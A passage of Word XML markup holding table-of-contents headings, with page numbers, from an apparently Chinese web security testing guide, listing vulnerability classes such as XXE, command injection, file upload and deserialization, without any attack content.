              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>2.16.3 HTTP</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>响应分割</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4 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>106</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4E1B1F2D" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434555" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>2.16.4 HTTP</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>参数污染</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5 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>109</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="0187D0A0" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434556" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>2.16.5 Host</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>头攻击</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6 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>110</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="525B4458" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434557" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>2.16.6 SQL</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>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7 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>112</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="1259C2FB" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434558" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>2.16.7 NoSQL</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>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8 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>116</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="1899E26A" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434559" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>2.16.8 LDAP</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>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9 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>118</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="628FBE11" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434560" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>2.16.9 XML</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>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0 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>119</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="3F7B8FE8" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="007C64E8" w:rsidRDefault="000B549D" w:rsidP="007C64E8">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="right" w:leader="dot" w:pos="8295"/>
                <w:tab w:val="right" w:leader="dot" w:pos="8400"/>
              </w:tabs>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434561" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="007C64E8">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:noProof/>
                </w:rPr>
                <w:t>2.16.10 XXE</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="007C64E8">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:tab/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="007C64E8">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="007C64E8">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:instrText xml:space="preserve"> PAGEREF _Toc498434561 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="007C64E8">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="007C64E8">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="007C64E8">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>121</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="007C64E8">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="024C892F" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434562" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>2.16.11 XPATH</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>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2 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>123</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4D3771A4" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434563" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.16.12 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>命令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3 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>125</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="630F88CE" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434564" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.16.13 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>任意文件上传</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4 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>127</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="66002AB7" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434565" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.16.14 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>反序列化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5 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>131</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="2F738D31" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D">
            <w:pPr>
              <w:pStyle w:val="22"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434566" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.17 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>专项漏洞</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6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32</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:webHidden/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="7EFC5B0D" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434567" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>2.17.1 Web</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>组件（</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>SSL/WebDAV</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>）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7 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>132</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="323E0227" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434568" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.17.2 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>中间件相关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8 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>133</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
